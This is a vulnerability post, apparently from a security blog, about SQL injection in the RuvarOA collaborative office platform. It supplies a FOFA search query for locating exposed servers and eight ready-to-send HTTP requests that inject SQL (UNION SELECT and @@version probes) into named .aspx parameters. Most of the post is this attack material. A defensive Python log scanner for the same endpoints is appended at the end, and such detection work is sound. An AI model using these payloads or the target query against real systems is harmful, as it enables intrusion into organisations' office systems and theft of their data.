Babing
Published on 2024-08-30

R18-1 Ruvar-OA Collaborative Office Platform - SQL

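Vulnerability description:

This OA system was designed by Guangzhou Luhua Computer Technology Co., Ltd. (广州市璐华计算机科技有限公司). It combines component technology with Web technology, runs on the Windows platform, and is built on a large relational database management system. With administrative office work as its core and integrated business office work as its goal, it brings networking, wireless communication and other information technologies together into a new type of office automation application system.

Affected versions:

RuvarOA V6.01, RuvarOA V12.01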

Network asset mapping:

FOFA query:

body="txt_admin_key"

Vulnerability reproduction:

payload1:

GET /DepartmentPlan/department_plan_attach_download.aspx?sys_file_storage_id=%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCHAR%28113%29%2bCHAR%28106%29%2bCHAR%28118%29%2bCHAR%2898%29%2bCHAR%28113%29%2bCHAR%2873%29%2bCHAR%28107%29%2bCHAR%2866%29%2bCHAR%2881%29%2bCHAR%2871%29%2bCHAR%2889%29%2bCHAR%28114%29%2bCHAR%2888%29%2bCHAR%2871%29%2bCHAR%2876%29%2bCHAR%2866%29%2bCHAR%2890%29%2bCHAR%2886%29%2bCHAR%2874%29%2bCHAR%28109%29%2bCHAR%2898%29%2bCHAR%28106%29%2bCHAR%28107%29%2bCHAR%2885%29%2bCHAR%2871%29%2bCHAR%2877%29%2bCHAR%2899%29%2bCHAR%2885%29%2bCHAR%28103%29%2bCHAR%28118%29%2bCHAR%28101%29%2bCHAR%28120%29%2bCHAR%2874%29%2bCHAR%28117%29%2bCHAR%28109%29%2bCHAR%2865%29%2bCHAR%2882%29%2bCHAR%28105%29%2bCHAR%2876%29%2bCHAR%28102%29%2bCHAR%28120%29%2bCHAR%2887%29%2bCHAR%28101%29%2bCHAR%28105%29%2bCHAR%2884%29%2bCHAR%28113%29%2bCHAR%28118%29%2bCHAR%28113%29%2bCHAR%28118%29%2bCHAR%28113%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33
Connection: close

payload2:

GET /filemanage/file_memo.aspx?file_id=@@version HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33
Connection: close

payload3:

GET /WorkFlow/wf_work_print.aspx?idlist=@@version HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate

payload4:

GET /WorkFlow/wf_work_form_save.aspx?office_missive_id=@@version HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33
Connection: close

payload5:

GET /WorkFlow/wf_office_file_history_show.aspx?id=1%27%20and%20%28@@version%29%3E0-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33
Connection: close

payload6:

GET /WorkFlow/wf_get_fields_approve.aspx?template_id=@@version HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33
Connection: close

payload7:

GET /include/get_dict.aspx?bi_value=1&bt_id=1%29+AND+1248+IN+%28SELECT+@@version%29+AND+%282558%3D2558&bt_name=1&bi_name=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33
Connection: close

payload8:

GET /LHMail/email_attach_delete.aspx?attach_id=@@version HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33
Connection: close
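
Detection note (an added example, not part of the original post): each of the eight requests above places SQL text in one ID-style query parameter of a specific .aspx page, so access logs can be screened for those endpoint/parameter pairs carrying a non-identifier value. The log line layout, the sample lines and the rule that legitimate values are plain identifiers are assumptions made for this sketch.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint -> parameter pairs taken from the requests listed on this page
# (paths lower-cased because IIS treats them case-insensitively).
WATCHED = {
    "/departmentplan/department_plan_attach_download.aspx": "sys_file_storage_id",
    "/filemanage/file_memo.aspx": "file_id",
    "/workflow/wf_work_print.aspx": "idlist",
    "/workflow/wf_work_form_save.aspx": "office_missive_id",
    "/workflow/wf_office_file_history_show.aspx": "id",
    "/workflow/wf_get_fields_approve.aspx": "template_id",
    "/include/get_dict.aspx": "bt_id",
    "/lhmail/email_attach_delete.aspx": "attach_id",
}
# Assumption: legitimate values are identifiers or comma-separated lists of them.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_,\-]*")

def suspicious_param(request_target):
    """Return (path, param, decoded value) if a watched parameter is not a plain identifier."""
    parts = urlsplit(request_target)
    param = WATCHED.get(parts.path.lower())
    if param is None:
        return None
    # parse_qs percent-decodes values, so encoded quotes and spaces are seen in clear.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if name.lower() == param and not SAFE_VALUE.fullmatch(value):
                return (parts.path, param, value)
    return None

def scan(lines):
    """Scan lines of the constructed form 'date time client METHOD target status'."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 6:
            continue  # not a line in the assumed layout
        hit = suspicious_param(fields[4])
        if hit:
            hits.append((fields[2], *hit))
    return hits

# Constructed sample log lines (documentation-range client addresses).
SAMPLE_LOG = [
    "2024-08-30 10:00:01 192.0.2.10 GET /filemanage/file_memo.aspx?file_id=1042 200",
    "2024-08-30 10:00:05 198.51.100.7 GET /filemanage/file_memo.aspx?file_id=@@version 200",
    "2024-08-30 10:00:09 198.51.100.7 GET /WorkFlow/wf_office_file_history_show.aspx?id=1%27%20and%20%28@@version%29%3E0-- 200",
    "2024-08-30 10:00:12 192.0.2.10 GET /include/get_dict.aspx?bi_value=1&bt_id=3&bt_name=1&bi_name=1 200",
]
for hit in scan(SAMPLE_LOG):
    print(hit)
```

Real IIS W3C logs usually split the target into cs-uri-stem and cs-uri-query fields; join them with "?" before calling suspicious_param.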
